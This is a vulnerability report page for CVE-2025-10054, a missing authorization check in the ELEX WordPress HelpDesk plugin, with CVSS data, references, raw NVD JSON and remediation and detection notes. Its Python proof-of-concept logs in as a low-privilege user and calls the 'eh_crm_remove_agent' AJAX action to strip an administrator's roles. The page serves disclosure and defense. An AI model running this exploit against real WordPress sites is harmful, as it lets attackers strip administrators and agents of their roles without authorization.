Security Vulnerability Report
CVE-2025-10054 CVSS 4.3 MEDIUM

CVE-2025-10054

Published: 2025-11-21 13:15:46
Last Modified: 2026-04-08 17:19:55

Description

The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_remove_agent' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the role and capabilities of any user with an Administrator, WSDesk Supervisor, or WSDesk Agents role.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:elula:wsdesk:*:*:*:*:free:wordpress:*:* - VULNERABLE
ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys  # NOTE(review): imported but never used in this script

# CVE-2025-10054 PoC - ELEX WordPress HelpDesk IDOR/Privilege Escalation
# Target: WordPress site with ELEX HelpDesk plugin <= 3.3.1
#
# Root cause (CWE-862, per the report's weakness entry): the admin-ajax
# handler registered for the 'eh_crm_remove_agent' action does not verify the
# caller's capability before acting on the user id it receives, so any
# authenticated account can reach it. The report points at
# includes/class-crm-ajax-functions-two.php in the plugin's trunk and at
# changeset 3399391 as the patch; affected versions are < 3.3.2
# (versionEndExcluding in the CPE match), so the fix is to update the plugin.
#
# Defensive notes:
#  - The server-side fix is an authorization check in the handler (in
#    WordPress terms a current_user_can() check, normally paired with a nonce
#    check via check_ajax_referer()) before touching the target user's roles.
#  - Detection: POST /wp-admin/admin-ajax.php with action=eh_crm_remove_agent
#    from a session that does not hold an admin/supervisor role, and
#    unexpected role/capability removals on Administrator, WSDesk Supervisor
#    or WSDesk Agent accounts.

target_url = "http://target-wordpress-site.com"

# Authentication - Any subscriber+ account works
username = "attacker_account"
password = "attacker_password"

# Target user ID to strip roles from (typically 1 for admin)
target_user_id = 1

def exploit_cve_2025_10054():
    """
    Exploit for CVE-2025-10054: Missing authorization check in eh_crm_remove_agent
    This PoC demonstrates how an authenticated low-privilege user can remove
    roles/capabilities from any user including administrators.

    Flow: log in through wp-login.php with the configured credentials, then
    POST the vulnerable AJAX action with the target user id to admin-ajax.php.

    Returns:
        bool: False when no WordPress login cookie is observed after the login
        request, True when the AJAX request returns HTTP 200, False otherwise.
        Note that a 200 from admin-ajax.php only shows the request was
        accepted; it does not by itself confirm the server-side effect.
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privilege account
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/'
    }
    login_response = session.post(login_url, data=login_data)

    # Login success is inferred from the presence of a cookie key, not from
    # the response body (login_response itself is never inspected).
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False

    print("[+] Successfully authenticated as low-privilege user")

    # Step 2: Exploit the vulnerability
    # 'remove_agent_user_id' is fully caller-controlled; the unpatched handler
    # trusts it without checking who is asking (the missing capability check).
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'eh_crm_remove_agent',
        'remove_agent_user_id': target_user_id
    }
    exploit_response = session.post(ajax_url, data=exploit_data)

    # Only the HTTP status is checked here; the body is printed, not parsed.
    if exploit_response.status_code == 200:
        print(f"[+] Exploit sent successfully for target user ID: {target_user_id}")
        print(f"[+] Response: {exploit_response.text}")
        print("[*] Target user roles/capabilities have been stripped")
        return True
    else:
        print(f"[-] Exploit failed with status: {exploit_response.status_code}")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-10054 PoC - ELEX WordPress HelpDesk Plugin")
    print("Vulnerability: Missing authorization in eh_crm_remove_agent")
    print("=" * 60)
    exploit_cve_2025_10054()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10054", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:45.657", "lastModified": "2026-04-08T17:19:55.210", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_remove_agent' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the role and capabilities of any user with an Administrator, WSDesk Supervisor, or WSDesk Agents role."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elula:wsdesk:*:*:*:*:free:wordpress:*:*", "versionEndExcluding": "3.3.2", "matchCriteriaId": 
"6D3C90F8-FBE9-409A-A29E-3D775928E2BF"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php#L77", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3399391/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/07c92f79-94ac-4153-9ab2-9608601508b0?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}